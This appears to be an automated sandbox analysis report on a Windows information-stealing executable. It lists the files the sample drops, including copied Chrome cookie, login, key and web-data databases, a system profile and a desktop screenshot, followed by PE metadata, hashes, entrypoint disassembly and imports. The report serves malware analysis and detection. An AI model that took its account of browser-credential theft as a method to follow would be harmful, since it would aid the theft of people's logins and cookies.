SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YfbFSJTjjJ\_Files\_Chrome\default_cookies.db Download File
Process:	C:\Users\user\AppData\Local\Temp\305.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YfbFSJTjjJ\_Files\_Chrome\default_key.bin Download File
Process:	C:\Users\user\AppData\Local\Temp\305.exe
File Type:	data
Category:	dropped
Size (bytes):	32
Entropy (8bit):	4.9375
Encrypted:	false
SSDEEP:	3:Tydsb5i6Dn:qqi6D
MD5:	18962F5697042F84578AC7F855F38AC5
SHA1:	3D7CC906C6F649EEBF0E0EBEC809B89B584033E1
SHA-256:	7DDBE41709AE056CDAD2E15C357500D6E5BEBE27D8A708C4069D8C6863A5BE99
SHA-512:	36F5BFEF91BFB07D2A45CFCA5D57126B6D2DCD05BE17AFF40E04B5F1EBB8E1D51A4584BA8F1F3326CA592D9A4D63E13A12C125674ECE0B052EED7B11C52AFF1D
Malicious:	false
Reputation:	unknown
Preview:	...*@.0n...PNI~.o.O......M+.YA

C:\Users\user\AppData\Local\Temp\YfbFSJTjjJ\_Files\_Chrome\default_logins.db Download File
Process:	C:\Users\user\AppData\Local\Temp\305.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YfbFSJTjjJ\_Files\_Chrome\default_webdata.db Download File
Process:	C:\Users\user\AppData\Local\Temp\305.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YfbFSJTjjJ\_Files\_Information.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\305.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	6974
Entropy (8bit):	3.545952797812319
Encrypted:	false
SSDEEP:	192:RFBi8UOpGQGXJ0eDcDDfZmEiv5bJtWmGu3b:RFw8UOpGQGXJ0eDcDDfZmEiv5bJtWmGI
MD5:	367C1BF347EA4AFD78C409EDDF473D36
SHA1:	4E42FCD0D36CA3E2242B59DE51D02DBB5FD9067E
SHA-256:	6ED9D59308AD607D617F495D78BE4BBA8424738524B1A796D1BC6DDC6DED9F4C
SHA-512:	B6E199408D015B6597802C767429A1A52D62AC5C9F443798F915131D3F3AAAD4FB006657322906C9FDAB1DB1EBA545838087CDC6210A7BD39D89EA0D60715C25
Malicious:	false
Reputation:	unknown
Preview:	..S.t.a.r.t. .B.u.i.l.d.:. . . . . . . . . . . . . .C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.3.0.5...e.x.e.....O.S.:. . . . . . . . . . . . . . . . . . . . . . .W.i.n.d.o.w.s. .1.0. .P.r.o. . . .6.4.-.b.i.t._.(.x.6.4.). . . .B.u.i.l.d.:. .1.7.1.3.4. . . .R.e.l.e.a.s.e.:. .1.8.0.3.....O.S. .L.a.n.g.u.a.g.e.:. . . . . . . . . . . . . .e.n.-.U.S.....K.e.y.b.o.a.r.d. .L.a.n.g.u.a.g.e.s.:. . . . . . .E.n.g.l.i.s.h. .(.U.n.i.t.e.d. .S.t.a.t.e.s.). .\|. .....L.o.c.a.l. .D.a.t.e. .a.n.d. .T.i.m.e.:. . . . . .2.0.2.1.-.1.2.-.0.1. .0.9.:.1.4.:.3.7.....U.T.C.:. . . . . . . . . . . . . . . . . . . . . .+.0.1.0.0.....U.s.e.r.N.a.m.e. .(.C.o.m.p.u.t.e.r.N.a.m.e.).:. .j.o.n.e.s. .(.2.4.7.5.2.5.).....C.P.U.:. . . . . . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z. .(.C.o.r.e.s.:. .4.).....T.o.t.a.l. .R.A.M.:. . . . . . . . . . . . . . . .8.1.9.1. . .M.B.....G.P.U.:. . . . . . . . . . . . . . . . . . . . . .A.M.D. .

C:\Users\user\AppData\Local\Temp\YfbFSJTjjJ\_Files\_Screen_Desktop.jpeg Download File
Process:	C:\Users\user\AppData\Local\Temp\305.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	82372
Entropy (8bit):	7.8532709031317935
Encrypted:	false
SSDEEP:	1536:ICPrbYvHTdImdeJzF7AVcdABAJMZRGFK20HYyPF1Zj0gzQhax/X8zbb+f:BrjmdeJz8/CIRO50HYyxSMJa+f
MD5:	38C7137F820D5391670B00D9B3364CB5
SHA1:	68941BFA5FBD876B1AA4F037500E82F77DD7CC02
SHA-256:	26476F59F90273C81D07938EC0E800A80C988D730629A9AF894E1202F8EDFC4F
SHA-512:	9B29703C4BC01DD6341DA1D8DF4D062EF8157825B02E54BE7C89934DB3185463B63B76633C285B57E48ADFC2D6E3E0A9FEEC855AA818BB27BC4BF3C69D37BCBA
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~...*.:-.\|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v1...H.....7.....;...........s.b.....9v8.+....?..O....[.Se.=.0c..7..8..hTv...(.W..+R..(...+....Y]i_h..~H.....x..s.-....S..._?.<.._.Gt.......4..;....D.........4.T?....+...<j.....>.........,.j.k.y-.1.#...Nm....U..u.z.RR..hb%..R.(..4..kV6.....s...

C:\Users\user\AppData\Local\Temp\YfbFSJTjjJ\files_\_Chrome\default_cookies.db Download File
Process:	C:\Users\user\AppData\Local\Temp\305.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YfbFSJTjjJ\files_\_Chrome\default_key.bin Download File
Process:	C:\Users\user\AppData\Local\Temp\305.exe
File Type:	data
Category:	dropped
Size (bytes):	32
Entropy (8bit):	4.9375
Encrypted:	false
SSDEEP:	3:Tydsb5i6Dn:qqi6D
MD5:	18962F5697042F84578AC7F855F38AC5
SHA1:	3D7CC906C6F649EEBF0E0EBEC809B89B584033E1
SHA-256:	7DDBE41709AE056CDAD2E15C357500D6E5BEBE27D8A708C4069D8C6863A5BE99
SHA-512:	36F5BFEF91BFB07D2A45CFCA5D57126B6D2DCD05BE17AFF40E04B5F1EBB8E1D51A4584BA8F1F3326CA592D9A4D63E13A12C125674ECE0B052EED7B11C52AFF1D
Malicious:	false
Reputation:	unknown
Preview:	...*@.0n...PNI~.o.O......M+.YA

C:\Users\user\AppData\Local\Temp\YfbFSJTjjJ\files_\_Chrome\default_logins.db Download File
Process:	C:\Users\user\AppData\Local\Temp\305.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YfbFSJTjjJ\files_\_Chrome\default_webdata.db Download File
Process:	C:\Users\user\AppData\Local\Temp\305.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YfbFSJTjjJ\files_\screenshot.jpg Download File
Process:	C:\Users\user\AppData\Local\Temp\305.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	82372
Entropy (8bit):	7.8532709031317935
Encrypted:	false
SSDEEP:	1536:ICPrbYvHTdImdeJzF7AVcdABAJMZRGFK20HYyPF1Zj0gzQhax/X8zbb+f:BrjmdeJz8/CIRO50HYyxSMJa+f
MD5:	38C7137F820D5391670B00D9B3364CB5
SHA1:	68941BFA5FBD876B1AA4F037500E82F77DD7CC02
SHA-256:	26476F59F90273C81D07938EC0E800A80C988D730629A9AF894E1202F8EDFC4F
SHA-512:	9B29703C4BC01DD6341DA1D8DF4D062EF8157825B02E54BE7C89934DB3185463B63B76633C285B57E48ADFC2D6E3E0A9FEEC855AA818BB27BC4BF3C69D37BCBA
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~...*.:-.\|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v1...H.....7.....;...........s.b.....9v8.+....?..O....[.Se.=.0c..7..8..hTv...(.W..+R..(...+....Y]i_h..~H.....x..s.-....S..._?.<.._.Gt.......4..;....D.........4.T?....+...<j.....>.........,.j.k.y-.1.#...Nm....U..u.z.RR..hb%..R.(..4..kV6.....s...

C:\Users\user\AppData\Roaming\hiftsuu Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	336896
Entropy (8bit):	6.093285235983875
Encrypted:	false
SSDEEP:	6144:MaXePnFllS35U3jiXtHAt7ewOljc4hDxElcyG+V5:MaqllS35U3jiXtHAt7XOlw4jElcyG
MD5:	1A430B2CBF785427C87C48D29A1A8C0F
SHA1:	E9B392C34C1BF0E42599BB561F111E3BCEA7B3D9
SHA-256:	1D1FC9D23AA14B4F484FB86C173C94084BC14A9F551747B6E06366649A229AF5
SHA-512:	28BA06D7CC60F27C948071A19BF0E5A64E9DB3AA262BDB419AD208C2FD6C7E075F9BDA85C241A329239B1F584845FBF1FAF590D69856E775FA27307EADF6FD8A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OW...9P..9P..9Ph`.P..9P.X.P..9P.X.P..9P.X.Py.9P.V.P..9P..8P..9P.X.P..9P.X.P..9P.X.P..9PRich..9P................PE..L...L.\|_.....................@...................@..........................@..................................................(.......pA......................0...................................H...@...............l............................text...N........................... ..`.data...@...........................@....rsrc...pA.......B..................@..@.reloc...;.......<..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\hiftsuu:Zone.Identifier Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.242066218824777
Encrypted:	false
SSDEEP:	12288:+pU+NPxKxbZsNZrx/l93X1K4VoJq9jccuulyDOXqDnRNwQ5f:YU+NPxKxbZWZrxXTV
MD5:	26BE0D74D34F16E97CF8A7D1BB7C5B23
SHA1:	2F42282468D436AF6EDFEEFFFBFEBD8FE2DF73AD
SHA-256:	412837BAFFDF8F2BC94354B492E456D8FA541CE6A65F11E5EA67C092E66F8496
SHA-512:	0104B39CA19C29DCBDA03EB9FBD1506879586760C55618F49892D5CC6B81133F416D0EE51DE126B3676B1FA80523B316DEFFE8CD362700A6F19472B74DB37E01
Malicious:	false
Reputation:	unknown
Preview:	regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmZ..m.................................................................................................................................................................................................................................................................................................................................................1.0........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.349858414047052
Encrypted:	false
SSDEEP:	384:VjT5K5w+v4KgnVVeeDze/1NKZtjHT8GcwcHn1xK7jbr:ptKRg/eeDze9NYtjgGcwckjb
MD5:	FAADDF410128036CC5827B49FB1AC18D
SHA1:	27BA8D4F68109117BB3E088A9273A1F8546B41C1
SHA-256:	054270E5F8CF83B749A5EBB42E06D177BDA85C9E20469225A9444930B82E89A0
SHA-512:	A6FF0E115655D584DDBFBA0E9BF1DB7E9E5C72247048EA85020CE4F69E00669DD4A040E672A6C711F55717C5F7A211BC474E5A2B651B9835E6F46E474F555696
Malicious:	false
Reputation:	unknown
Preview:	regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmZ..m.................................................................................................................................................................................................................................................................................................................................................1.0HvLE.N......G............O..@.qR.F.>..b..................... ..hbin................p.\..,..........nk,.Z..m.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .Z..m........ ........................... .......Z.......................Root........lf......Root....nk .Z..m.................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.093285235983875
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	v72n86vFFq.exe
File size:	336896
MD5:	1a430b2cbf785427c87c48d29a1a8c0f
SHA1:	e9b392c34c1bf0e42599bb561f111e3bcea7b3d9
SHA256:	1d1fc9d23aa14b4f484fb86c173c94084bc14a9f551747b6e06366649a229af5
SHA512:	28ba06d7cc60f27c948071a19bf0e5a64e9db3aa262bdb419ad208c2fd6c7e075f9bda85c241a329239b1f584845fbf1faf590d69856e775fa27307eadf6fd8a
SSDEEP:	6144:MaXePnFllS35U3jiXtHAt7ewOljc4hDxElcyG+V5:MaqllS35U3jiXtHAt7XOlw4jElcyG
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OW...9P..9P..9Ph`.P..9P.X.P..9P.X.P..9P.X.Py.9P.V.P..9P..8P..9P.X.P..9P.X.P..9P.X.P..9PRich..9P................PE..L...L.\|_...

File Icon


Icon Hash:	aedaae9ecea62aa2

Static PE Info

General
Entrypoint:	0x4194d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5F7CB04C [Tue Oct 6 17:58:36 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	eddec1d3c2023ed0e1e37ce0535d3b62

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F43B4E0329Bh
call 00007F43B4DFBF96h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0043B7C0h
push 0041AFA0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [0043E3FCh]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [004012C4h]
cmp dword ptr [004C9C3Ch], 00000000h
jne 00007F43B4DFBF90h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [0040124Ch]
call 00007F43B4DFC113h
mov dword ptr [ebp-6Ch], eax
call 00007F43B4E03C9Bh
test eax, eax
jne 00007F43B4DFBF8Ch
push 0000001Ch
call 00007F43B4DFC0D0h
add esp, 04h
call 00007F43B4E01D48h
test eax, eax
jne 00007F43B4DFBF8Ch
push 00000010h
call 00007F43B4DFC0BDh
add esp, 04h
push 00000001h
call 00007F43B4E01C93h
add esp, 04h
call 00007F43B4E03C0Bh
mov dword ptr [ebp-04h], 00000000h
call 00007F43B4E02CBFh
test eax, eax

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3bda4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcb000	0x4170	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd0000	0x1d30	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x13c0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x18a48	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x36c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3c24e	0x3c400	False	0.577671161826	data	6.93440652301	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x3e000	0x8cc40	0xde00	False	0.0329215934685	data	0.442963923176	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xcb000	0x4170	0x4200	False	0.725201231061	data	6.31427116588	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd0000	0x3bb6	0x3c00	False	0.40234375	data	4.17421531088	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xcb190	0x25a8	data	Spanish	Colombia
RT_ICON	0xcd738	0x10a8	data	Spanish	Colombia
RT_STRING	0xce868	0x2c6	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0xceb30	0x63c	data	Divehi; Dhivehi; Maldivian	Maldives
RT_ACCELERATOR	0xce808	0x60	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_ICON	0xce7e0	0x22	data	Spanish	Colombia

Imports

DLL

Import

KERNEL32.dll

ExitProcess, GetComputerNameA, GetFullPathNameA, LocalUnlock, EnumResourceNamesW, SetCriticalSectionSpinCount, GlobalMemoryStatus, FindResourceA, FindFirstFileW, SetThreadContext, FindFirstChangeNotificationW, WriteConsoleInputW, SetFilePointer, EnumDateFormatsExW, CopyFileExW, GetNumaProcessorNode, TlsGetValue, GetStringTypeA, SetLocalTime, UnmapViewOfFile, MoveFileExA, CommConfigDialogA, BuildCommDCBAndTimeoutsA, DeleteVolumeMountPointA, SetUnhandledExceptionFilter, MoveFileExW, InterlockedDecrement, GetCurrentProcess, WritePrivateProfileSectionA, SetDefaultCommConfigW, SetFirmwareEnvironmentVariableA, QueryDosDeviceA, GlobalLock, SetVolumeMountPointW, SetEvent, SetThreadExecutionState, OpenSemaphoreA, SleepEx, FreeEnvironmentStringsA, _lclose, GetCommConfig, GetProcessHeap, GetNumberFormatA, GetPrivateProfileStringW, CreateRemoteThread, GetCompressedFileSizeW, WaitNamedPipeW, EnumTimeFormatsA, SetCommState, GetSystemWow64DirectoryA, WriteFileGather, TzSpecificLocalTimeToSystemTime, TlsSetValue, AllocateUserPhysicalPages, FindResourceExA, GetConsoleCP, GetPrivateProfileIntA, LoadLibraryW, GetConsoleMode, FatalAppExitW, GetThreadSelectorEntry, CopyFileW, GetPrivateProfileStructW, GetCalendarInfoA, SetSystemTimeAdjustment, GetProcessHandleCount, GetSystemWindowsDirectoryA, ReadConsoleOutputW, GetConsoleAliasExesLengthW, GetSystemTimeAdjustment, GetVersionExW, SetConsoleCP, LeaveCriticalSection, GetFileAttributesA, lstrcpynW, SetDllDirectoryA, SetConsoleMode, HeapValidate, GetVolumePathNamesForVolumeNameW, SetConsoleCursorPosition, GetBinaryTypeA, IsBadWritePtr, TerminateProcess, GetModuleFileNameW, CreateActCtxA, GetBinaryTypeW, lstrcmpW, lstrlenW, IsBadStringPtrA, GetTempPathW, CreateJobObjectA, GetNamedPipeHandleStateW, EnumSystemLocalesA, VerifyVersionInfoW, SetCurrentDirectoryA, GetCPInfoExW, OpenMutexW, GetLastError, ChangeTimerQueueTimer, GetLongPathNameW, SetLastError, GetProcAddress, VirtualAlloc, HeapSize, PeekConsoleInputW, BackupWrite, CreateNamedPipeA, EnumDateFormatsExA, CreateJobSet, LocalLock, SetStdHandle, EnterCriticalSection, VerLanguageNameW, SearchPathA, BuildCommDCBW, DefineDosDeviceA, GetPrivateProfileStringA, GetAtomNameA, OpenMutexA, CreateSemaphoreW, LocalAlloc, WritePrivateProfileStringA, CreateHardLinkW, IsSystemResumeAutomatic, GetExitCodeThread, SetCurrentDirectoryW, SetFileApisToANSI, VirtualLock, GetCurrentConsoleFont, HeapWalk, GetPrivateProfileStructA, SetNamedPipeHandleState, SetSystemTime, SetEnvironmentVariableA, GetModuleFileNameA, GetPrivateProfileSectionNamesA, GetDefaultCommConfigA, FindNextFileA, WriteProfileStringA, WTSGetActiveConsoleSessionId, EnumDateFormatsA, CreateIoCompletionPort, SetConsoleTitleW, GetModuleHandleA, QueueUserWorkItem, ContinueDebugEvent, lstrcatW, HeapSetInformation, FreeEnvironmentStringsW, GetConsoleTitleW, WriteProfileStringW, EnumDateFormatsW, CompareStringA, GetFileAttributesExW, GetConsoleCursorInfo, FatalAppExitA, WriteConsoleOutputAttribute, OutputDebugStringA, SetProcessShutdownParameters, FindFirstVolumeA, TerminateJobObject, CloseHandle, DeleteTimerQueueTimer, DeleteFileW, GlobalAddAtomW, SetFileValidData, FindActCtxSectionStringW, ResetWriteWatch, UnregisterWaitEx, InterlockedPushEntrySList, CopyFileExA, lstrcpyA, MoveFileA, DeleteFileA, EncodePointer, DecodePointer, GetCommandLineW, 